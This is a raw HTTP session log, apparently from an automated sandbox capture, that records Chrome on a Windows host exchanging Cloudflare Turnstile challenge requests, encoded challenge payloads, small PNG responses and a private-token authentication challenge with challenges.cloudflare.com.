                                                        2025-03-17 16:42:31 UTC3593OUTData Raw: 44 74 59 4d 2d 4d 30 4d 37 4d 58 4d 54 6e 51 49 6e 51 48 4d 6e 55 61 30 77 6d 6e 2d 51 77 51 39 46 55 33 64 57 51 6b 73 51 73 55 70 38 70 71 51 63 57 51 74 2b 57 70 32 38 2b 51 2d 57 73 65 70 56 51 47 55 51 7a 39 57 41 41 57 51 41 33 61 4d 61 64 59 34 4d 33 38 51 6f 64 31 51 51 53 4a 77 51 70 7a 51 47 35 4d 65 51 71 4c 6d 68 74 51 68 64 7a 41 48 52 35 57 31 76 52 72 44 51 31 4d 6e 7a 33 51 51 54 6d 51 46 4d 6e 52 50 34 33 46 70 48 68 62 55 51 6a 51 51 67 43 73 6e 76 6a 42 65 58 30 79 50 34 77 61 4d 51 52 2d 6e 67 47 51 73 6d 73 71 61 79 36 51 33 73 51 63 6d 69 51 33 53 74 34 66 51 51 4a 47 51 51 50 63 42 6e 6e 51 73 38 51 38 53 6d 77 49 5a 58 2d 4f 6e 4f 51 65 55 79 2d 58 53 69 30 4a 7a 6d 38 43 31 70 48 41 69 51 56 37 57 67 2d 51 73 2b 65 51 33 69 69 32
                                                        Data Ascii: DtYM-M0M7MXMTnQInQHMnUa0wmn-QwQ9FU3dWQksQsUp8pqQcWQt+Wp28+Q-WsepVQGUQz9WAAWQA3aMadY4M38Qod1QQSJwQpzQG5MeQqLmhtQhdzAHR5W1vRrDQ1Mnz3QQTmQFMnRP43FpHhbUQjQQgCsnvjBeX0yP4waMQR-ngGQsmsqay6Q3sQcmiQ3St4fQQJGQQPcBnnQs8Q8SmwIZX-OnOQeUy-XSi0Jzm8C1pHAiQV7Wg-Qs+eQ3ii2
                                                        2025-03-17 16:42:31 UTC1071INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:31 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 239516
                                                        Connection: close
                                                        cf-chl-gen: lRbkMHYQ8f8RQFQ4pbMQsSkBGqWr7gKDNq4r9bW6+4LjaNwEcOHhFnav8bEwXTa6jfB1G0JxzfO5f4LWC2HDDh37xOX1Zqhxf9XbM7rfhV443qfNPFSLRVsRS0XjlY7rN+l1V9PtlhoXI/n3eldpxLcQxaho9UE/zmG+9aAYMIwIWl7E/PKBM7nXEMSTCNJAc5azjMkRXZfxubVQME1zqfTXPI0kVbB4OhlHyDOyJeFaKQSbZ5IvyOdlsyMPWs5BxeCu8rpV/TUf5XEbcRP7jsnjy+pB+jIX+OeiJFjQlvxLIFqWxp0XAmqef3Wl29//FemAbKgWWKTiM0F6ib3fkVTSTYZvZXNZCmRk01OB4dgSFa8Kp0cx94iHUdtPmKpvVtHzhBZhgfHoNRbbhgDudI3b+etr3QVeGS0S+Qp4DcvwU8pM9OlxTlhKqhPqd200YGrffHMezGcbakCTIxx0mh+RjF+UGFNzn4EMbAbnk3lwQAysQW7aFnhOGzu1EXrqIX0Yp4g7WP+PAPyLIWm0c2SBhw1PHt+jiWxMEVqazl5KFD6LSfaiqzg1BqWK7/lXXi//337drKyKf6/7ZkyVrVefgMMkN9fO0CkQ2NJvQO+dnBGVCxITKE9lBSgRIDYT9bQQ29+oS0Qosoyc36QVRlKW/u2B9e6/i0sM5tn5fbIa2QcvgOZ+PbePsPLU1vajgYbclHMk/EfR1LO0B/ZWegYpJnImQ7fzUmlddZZLW/e03x1vBH9QwnCp7N1NpGQUzDkpbmTcaz8Dr/VABoqCcZ5t7bVpi4CdJ1cdN8hfY8A=$EgkjZWg7Z3z2PrQKvXyG2w==
                                                        Server: cloudflare
                                                        CF-RAY: 921df1acfbde436f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:31 UTC298INData Raw: 72 71 32 70 6c 36 71 59 72 35 57 4d 73 59 36 44 73 71 57 56 68 4d 75 30 66 38 37 4d 6f 36 43 6a 71 63 6d 32 72 36 79 58 69 39 65 54 78 74 4b 35 71 61 76 59 6e 72 2b 2f 7a 73 4b 6a 70 38 66 71 74 62 66 6b 36 38 76 4c 33 73 4b 74 74 50 47 75 73 4f 62 76 74 2b 54 5a 79 66 34 41 31 4f 6b 43 42 64 66 55 32 67 58 48 2b 63 6a 68 41 63 6e 6e 35 50 76 6e 7a 42 58 6e 33 64 4d 43 30 4f 58 52 31 67 62 37 32 39 6f 4b 41 43 45 66 2b 76 4d 6d 4b 50 77 6f 35 78 66 35 2b 53 34 74 42 41 44 71 4e 50 49 4d 39 44 49 7a 4f 50 63 6d 4d 41 72 32 2b 52 51 76 46 30 42 46 48 54 30 66 46 45 63 64 42 69 42 47 48 68 34 4e 50 30 34 4d 4d 6b 4d 33 56 53 59 53 46 31 42 63 4b 6b 6b 75 4f 52 30 36 4d 79 30 2b 52 7a 56 6f 49 30 56 72 4a 57 74 50 51 31 78 50 55 6a 46 4b 58 30 31 6c 54 30 34
                                                        Data Ascii: rq2pl6qYr5WMsY6DsqWVhMu0f87Mo6Cjqcm2r6yXi9eTxtK5qavYnr+/zsKjp8fqtbfk68vL3sKttPGusObvt+TZyf4A1OkCBdfU2gXH+cjhAcnn5PvnzBXn3dMC0OXR1gb729oKACEf+vMmKPwo5xf5+S4tBADqNPIM9DIzOPcmMAr2+RQvF0BFHT0fFEcdBiBGHh4NP04MMkM3VSYSF1BcKkkuOR06My0+RzVoI0VrJWtPQ1xPUjFKX01lT04
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 57 4a 69 4a 69 5a 69 6e 65 64 6e 5a 31 6c 6f 49 47 64 71 5a 61 56 69 36 4b 69 6a 58 75 4b 62 59 35 2f 74 59 36 53 64 37 69 34 6c 6f 71 38 6b 71 65 52 6b 70 57 54 6b 4c 4b 78 78 4c 53 2f 71 34 57 32 68 38 71 6e 6e 71 32 78 30 61 75 30 74 74 66 59 6f 71 6d 55 7a 4c 75 65 6e 74 47 77 72 61 44 54 76 75 4c 47 70 74 54 4c 79 36 6e 41 37 64 33 63 30 62 48 54 77 50 54 67 30 4d 62 44 31 4e 58 37 32 76 76 65 30 2b 7a 6a 34 38 48 59 42 76 4c 30 36 63 58 32 33 64 66 34 2b 64 77 52 33 39 37 6b 34 65 6e 72 39 2f 67 50 2f 4f 7a 6d 45 51 76 74 49 76 6f 44 38 76 34 66 41 69 67 5a 2b 53 73 59 35 78 66 38 47 78 45 4e 42 79 59 46 4d 54 50 77 46 78 6f 78 4f 67 76 32 2b 7a 49 78 2b 54 59 57 52 55 55 6a 46 53 59 66 4f 69 56 49 54 6a 73 39 4d 79 74 47 49 7a 41 68 4d 6c 68 4e 57
                                                        Data Ascii: WJiJiZinednZ1loIGdqZaVi6KijXuKbY5/tY6Sd7i4loq8kqeRkpWTkLKxxLS/q4W2h8qnnq2x0au0ttfYoqmUzLuentGwraDTvuLGptTLy6nA7d3c0bHTwPTg0MbD1NX72vve0+zj48HYBvL06cX23df4+dwR397k4enr9/gP/OzmEQvtIvoD8v4fAigZ+SsY5xf8GxENByYFMTPwFxoxOgv2+zIx+TYWRUUjFSYfOiVITjs9MytGIzAhMlhNW
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 65 59 35 32 63 5a 6d 65 68 6f 58 4e 72 70 61 57 68 62 36 6d 70 71 58 4f 74 72 62 46 33 73 62 47 35 65 37 57 31 6d 33 2b 35 75 61 4f 44 76 62 32 78 6c 62 47 67 78 36 4c 4e 77 37 32 64 7a 61 57 49 71 63 76 54 31 73 65 4b 70 36 6d 61 30 63 62 61 32 5a 2b 76 33 64 33 64 6f 75 48 68 34 75 48 6c 35 65 62 59 36 4d 6e 6c 38 63 54 64 30 2b 72 71 7a 63 6e 42 30 74 62 4d 36 63 6e 53 36 63 48 61 7a 72 37 54 32 38 50 35 43 63 58 6d 31 77 33 46 38 4e 34 42 33 39 37 6b 34 64 38 45 35 50 54 55 31 76 58 37 32 39 73 42 44 4f 4c 39 34 76 50 37 34 78 6f 6d 35 51 4c 31 4c 76 6b 67 4d 65 72 6f 44 66 30 4c 4e 69 4d 6c 47 7a 55 74 44 44 6b 35 49 41 78 42 4f 53 41 55 44 78 73 30 2b 68 4d 73 47 67 77 70 44 77 67 38 52 7a 31 55 56 41 31 4d 4c 31 70 51 56 30 63 77 54 6d 41 67 57 6c
                                                        Data Ascii: eY52cZmehoXNrpaWhb6mpqXOtrbF3sbG5e7W1m3+5uaODvb2xlbGgx6LNw72dzaWIqcvT1seKp6ma0cba2Z+v3d3douHh4uHl5ebY6Mnl8cTd0+rqzcnB0tbM6cnS6cHazr7T28P5CcXm1w3F8N4B397k4d8E5PTU1vX729sBDOL94vP74xom5QL1LvkgMeroDf0LNiMlGzUtDDk5IAxBOSAUDxs0+hMsGgwpDwg8Rz1UVA1ML1pQV0cwTmAgWl
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 68 59 65 6f 66 4b 74 74 62 71 61 79 73 5a 36 67 6c 58 57 51 64 32 74 78 6c 49 53 70 6c 70 69 58 6d 34 75 4e 72 6e 36 7a 76 71 53 36 6c 59 65 4d 68 61 43 2b 67 73 66 4a 72 4b 6d 54 79 38 43 51 77 73 2f 53 70 37 44 52 7a 36 69 75 6e 4e 33 44 6e 39 72 50 75 62 4b 2b 31 37 72 73 32 4e 65 37 38 63 72 4f 70 72 37 6c 78 4c 62 55 74 2f 72 37 78 37 41 41 32 38 36 36 76 2f 62 4f 2b 4f 2f 55 43 63 58 33 32 75 62 4c 36 52 45 45 42 51 2f 4d 43 66 55 52 46 75 62 61 31 78 4c 6e 39 67 48 57 36 68 55 54 38 43 58 6b 49 2f 4d 70 34 51 66 65 39 76 73 41 37 67 33 74 4e 44 55 6c 42 6a 4d 6f 47 52 6b 4b 4a 76 67 76 46 42 63 52 50 78 49 30 4f 78 55 57 4b 55 67 4b 43 30 4d 4d 53 7a 6c 4c 49 78 41 39 49 55 63 66 51 56 64 48 53 53 38 59 53 31 35 4c 54 55 4d 72 51 7a 4e 56 50 30 4d
                                                        Data Ascii: hYeofKttbqaysZ6glXWQd2txlISplpiXm4uNrn6zvqS6lYeMhaC+gsfJrKmTy8CQws/Sp7DRz6iunN3Dn9rPubK+17rs2Ne78crOpr7lxLbUt/r7x7AA2866v/bO+O/UCcX32ubL6REEBQ/MCfURFuba1xLn9gHW6hUT8CXkI/Mp4Qfe9vsA7g3tNDUlBjMoGRkKJvgvFBcRPxI0OxUWKUgKC0MMSzlLIxA9IUcfQVdHSS8YS15LTUMrQzNVP0M
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 34 4f 68 67 4a 32 56 69 49 71 34 70 71 4b 4c 62 61 52 37 6b 37 4e 38 66 61 75 61 73 5a 6d 53 70 62 75 6a 6e 4d 61 34 72 4b 44 4e 79 49 76 4b 6f 36 4b 52 76 39 4b 52 70 38 50 4f 32 61 75 6f 34 4c 53 71 72 36 32 30 73 62 75 36 78 4a 2b 7a 78 61 61 36 71 2f 44 45 75 72 2b 39 78 4d 48 46 79 39 66 75 37 74 48 4f 78 2b 7a 6e 74 72 50 64 34 4d 54 36 34 74 62 58 31 73 62 48 41 66 72 37 45 65 44 48 37 67 48 6d 37 50 62 69 42 77 50 77 35 50 30 48 38 78 54 63 46 66 49 66 31 68 50 36 39 69 45 58 49 2f 6a 36 36 52 76 72 45 54 44 37 4a 41 77 6c 43 2b 33 34 4c 42 76 34 4c 44 77 7a 46 30 49 34 50 79 38 59 4e 6b 67 49 51 6b 49 6f 44 45 5a 47 4d 42 42 4b 53 6a 34 69 50 69 31 55 4c 31 70 51 53 69 70 61 4d 68 55 32 57 42 39 58 54 68 74 5a 59 57 4a 53 56 6d 5a 6d 5a 30 42 71
                                                        Data Ascii: 4OhgJ2ViIq4pqKLbaR7k7N8fauasZmSpbujnMa4rKDNyIvKo6KRv9KRp8PO2auo4LSqr620sbu6xJ+zxaa6q/DEur+9xMHFy9fu7tHOx+zntrPd4MT64tbX1sbHAfr7EeDH7gHm7PbiBwPw5P0H8xTcFfIf1hP69iEXI/j66RvrETD7JAwlC+34LBv4LDwzF0I4Py8YNkgIQkIoDEZGMBBKSj4iPi1UL1pQSipaMhU2WB9XThtZYWJSVmZmZ0Bq
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 4a 33 6f 36 6d 31 6d 35 65 7a 6b 36 6d 67 6b 4c 61 61 6b 6f 36 61 70 70 53 69 75 4c 32 2b 78 36 2b 34 69 5a 75 4d 73 62 4b 72 77 70 61 34 71 4d 36 78 72 4c 62 49 75 37 47 71 30 72 33 6a 32 4f 50 48 75 39 54 4c 79 36 69 6b 35 39 66 65 79 74 72 51 35 74 37 6e 79 73 6e 45 7a 4d 65 75 36 74 4c 35 38 4f 37 36 30 2b 44 67 38 67 63 44 41 2b 51 4c 43 4d 73 51 43 38 67 46 42 41 6b 53 34 39 2f 54 43 68 6e 52 43 4f 66 32 39 67 48 72 41 2f 58 78 38 41 48 79 2b 51 4c 34 39 41 41 58 35 77 6a 35 43 67 48 37 38 53 44 76 4e 67 49 53 43 68 6b 51 4b 76 63 59 2f 52 6b 7a 49 54 45 34 50 42 42 46 4e 68 5a 4b 47 79 63 5a 4a 77 68 47 44 6a 73 63 50 68 42 57 4c 44 45 6c 4d 78 52 53 47 6b 63 6f 53 68 78 69 4f 44 77 67 49 44 68 54 53 6b 68 70 58 6a 77 76 62 31 74 6a 4c 79 35 67 62
                                                        Data Ascii: J3o6m1m5ezk6mgkLaako6appSiuL2+x6+4iZuMsbKrwpa4qM6xrLbIu7Gq0r3j2OPHu9TLy6ik59feytrQ5t7nysnEzMeu6tL58O760+Dg8gcDA+QLCMsQC8gFBAkS49/TChnRCOf29gHrA/Xx8AHy+QL49AAX5wj5CgH78SDvNgISChkQKvcY/RkzITE4PBBFNhZKGycZJwhGDjscPhBWLDElMxRSGkcoShxiODwgIDhTSkhpXjwvb1tjLy5gb
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 7a 6d 33 79 71 6f 61 50 45 6d 37 71 62 67 62 6d 5a 71 38 69 36 6d 4a 62 50 71 73 50 4a 6f 4b 36 78 77 49 36 78 32 71 71 52 74 36 6e 5a 70 37 71 38 75 75 53 34 31 39 79 64 77 4c 58 63 6f 73 44 65 72 72 66 4c 76 64 50 41 79 63 48 68 79 74 4c 45 30 38 72 57 79 64 6f 41 32 66 50 66 79 39 63 48 76 51 6e 79 78 4f 59 4e 2f 64 33 76 79 66 6f 49 37 39 44 2b 39 66 63 5a 37 77 2f 76 31 51 37 74 41 42 30 50 37 4f 6f 6b 2f 74 77 6d 2b 41 48 30 42 50 6f 42 48 2b 34 45 43 2b 6a 37 42 51 6f 42 43 7a 67 54 46 68 67 45 46 68 6b 58 51 42 6a 34 44 42 67 65 4f 43 50 2b 49 67 46 47 48 43 49 61 4f 69 41 72 48 53 51 6e 4c 30 63 57 56 54 41 31 4d 46 73 78 47 56 38 75 54 42 77 31 4d 56 46 62 4e 54 5a 54 61 79 64 74 57 43 6c 76 50 6c 6f 74 4f 33 4a 4a 61 48 5a 4b 55 6d 78 58 4d 31
                                                        Data Ascii: zm3yqoaPEm7qbgbmZq8i6mJbPqsPJoK6xwI6x2qqRt6nZp7q8uuS419ydwLXcosDerrfLvdPAycHhytLE08rWydoA2fPfy9cHvQnyxOYN/d3vyfoI79D+9fcZ7w/v1Q7tAB0P7Ook/twm+AH0BPoBH+4EC+j7BQoBCzgTFhgEFhkXQBj4DBgeOCP+IgFGHCIaOiArHSQnL0cWVTA1MFsxGV8uTBw1MVFbNTZTaydtWClvPlotO3JJaHZKUmxXM1
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 6e 70 43 58 6d 71 4b 41 73 70 75 36 6d 49 62 51 75 34 79 7a 6a 37 32 50 70 74 6a 44 71 4e 57 59 7a 61 69 5a 33 37 65 59 30 4a 6d 37 6f 4d 65 6c 30 75 71 69 70 4e 62 4e 7a 36 37 63 72 4e 4b 6c 7a 65 76 6d 76 38 37 4a 31 2f 72 6e 79 37 36 2b 31 73 7a 66 77 76 43 2f 35 38 2f 67 31 66 37 57 34 65 37 41 37 66 37 66 30 74 4c 76 34 64 2f 58 41 39 4d 48 36 51 6e 37 33 69 44 30 33 43 49 6a 46 66 44 68 4b 51 4c 67 4a 76 73 42 49 43 6f 44 43 69 67 6a 2b 77 77 56 47 44 63 6f 4c 7a 72 35 4c 43 2f 36 44 6a 45 53 43 2f 34 30 4a 52 54 2b 4d 67 52 4a 42 79 49 74 52 69 51 38 43 56 49 6d 4c 79 59 72 45 45 34 57 51 79 52 47 47 46 34 30 4f 42 77 62 5a 56 41 68 53 43 52 53 4a 44 74 74 58 6a 30 39 51 45 68 6a 53 45 4e 4f 4c 57 56 34 55 7a 46 32 53 6d 31 4f 52 30 42 73 64 31 46
                                                        Data Ascii: npCXmqKAspu6mIbQu4yzj72PptjDqNWYzaiZ37eY0Jm7oMel0uqipNbNz67crNKlzevmv87J1/rny76+1szfwvC/58/g1f7W4e7A7f7f0tLv4d/XA9MH6Qn73iD03CIjFfDhKQLgJvsBICoDCigj+wwVGDcoLzr5LC/6DjESC/40JRT+MgRJByItRiQ8CVImLyYrEE4WQyRGGF40OBwbZVAhSCRSJDttXj09QEhjSENOLWV4UzF2Sm1OR0Bsd1F
                                                        2025-03-17 16:42:31 UTC1369INData Raw: 35 57 6c 6d 4a 75 49 77 49 7a 53 70 37 36 30 70 36 47 78 70 4b 65 61 78 5a 6a 56 71 62 6d 73 72 2b 48 56 74 4c 75 65 77 4e 6d 6b 79 63 72 44 32 4b 33 69 38 4b 54 6a 36 50 54 43 39 4d 72 4b 2b 65 7a 6f 33 62 54 37 7a 67 44 73 38 73 2f 46 77 65 44 67 43 63 4c 54 44 74 72 4b 79 77 62 5a 30 51 4c 6b 33 75 6f 41 35 65 2f 52 2b 2b 6b 64 48 66 76 53 36 67 44 7a 34 2f 44 65 33 2f 72 62 36 67 59 62 47 53 6b 4d 42 43 49 42 48 68 51 76 43 7a 55 6e 49 77 30 47 48 69 63 55 4d 2f 7a 35 45 30 44 32 48 6a 54 35 47 77 42 44 47 78 73 4b 4c 6b 73 4b 49 44 78 49 49 45 49 73 54 54 41 30 4d 56 46 58 4f 56 6f 74 56 30 34 34 51 6d 59 2f 58 43 52 4a 5a 43 74 47 4b 7a 73 72 4c 47 4a 69 53 30 42 42 64 6b 5a 6d 4b 30 4e 75 53 54 78 4a 4e 7a 6c 37 62 45 2b 42 66 33 69 47 65 58 56 71
                                                        Data Ascii: 5WlmJuIwIzSp760p6GxpKeaxZjVqbmsr+HVtLuewNmkycrD2K3i8KTj6PTC9MrK+ezo3bT7zgDs8s/FweDgCcLTDtrKywbZ0QLk3uoA5e/R++kdHfvS6gDz4/De3/rb6gYbGSkMBCIBHhQvCzUnIw0GHicUM/z5E0D2HjT5GwBDGxsKLksKIDxIIEIsTTA0MVFXOVotV044QmY/XCRJZCtGKzsrLGJiS0BBdkZmK0NuSTxJNzl7bE+Bf3iGeXVq


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449743104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:32 UTC639OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:33 UTC442INHTTP/1.1 400 Bad Request
                                                        Date: Mon, 17 Mar 2025 16:42:33 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 14
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: RV7BzSqVUFElLJqo0ijTc536qoWfVn5pgBGODnff+nsHsw9l6mcjtiQdZJ/h6XfaV7mMbSDpT5FYFNwcrz6yWQ==$7kq/JkdH3rjbqHPaDNr9ww==
                                                        Server: cloudflare
                                                        CF-RAY: 921df1b46d7142a6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:33 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                        Data Ascii: {"err":100280}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449744104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:33 UTC827OUTGET /cdn-cgi/challenge-platform/h/g/d/921df19f1aa9330c/1742229751867/S9e8vOBS_eqZ502 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:33 UTC200INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:33 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 921df1b67cbd43bc-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:33 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 09 00 00 00 28 08 02 00 00 00 a3 03 47 d4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDR(GIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449745104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:34 UTC856OUTGET /cdn-cgi/challenge-platform/h/g/pat/921df19f1aa9330c/1742229751868/0df0701f524323cd1dd6ed6b0a6c711cea6cb7d910bb71d6d33d24befe49df70/2Si4XeZsCj928_7 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:34 UTC143INHTTP/1.1 401 Unauthorized
                                                        Date: Mon, 17 Mar 2025 16:42:34 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        2025-03-17 16:42:34 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 44 66 42 77 48 31 4a 44 49 38 30 64 31 75 31 72 43 6d 78 78 48 4f 70 73 74 39 6b 51 75 33 48 57 30 7a 30 6b 76 76 35 4a 33 33 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gDfBwH1JDI80d1u1rCmxxHOpst9kQu3HW0z0kvv5J33AAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                        2025-03-17 16:42:34 UTC1INData Raw: 4a
                                                        Data Ascii: J


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449747104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:34 UTC468OUTGET /cdn-cgi/challenge-platform/h/g/d/921df19f1aa9330c/1742229751867/S9e8vOBS_eqZ502 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:34 UTC200INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:34 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 921df1bf3bf04356-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 09 00 00 00 28 08 02 00 00 00 a3 03 47 d4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDR(GIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449748104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:36 UTC1192OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 38760
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        cf-chl: 5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa
                                                        cf-chl-ra: 0
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
